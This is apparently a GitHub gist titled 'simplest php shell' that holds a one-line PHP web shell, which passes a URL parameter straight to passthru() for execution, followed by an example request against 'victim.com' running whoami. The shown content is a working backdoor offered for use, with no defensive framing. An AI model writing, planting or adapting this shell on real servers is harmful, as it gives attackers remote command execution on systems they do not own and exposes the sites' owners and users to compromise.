Skip to content

Instantly share code, notes, and snippets.

@enderphan94
Created August 13, 2020 14:04
Show Gist options
  • Save enderphan94/022a90b1f7ad651a5d0d9d5716bd0a55 to your computer and use it in GitHub Desktop.
Save enderphan94/022a90b1f7ad651a5d0d9d5716bd0a55 to your computer and use it in GitHub Desktop.
simplest php shell #php #shell
<?php passthru($_GET['cmd']); ?>
#http://victim.com?cmd=whoami
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment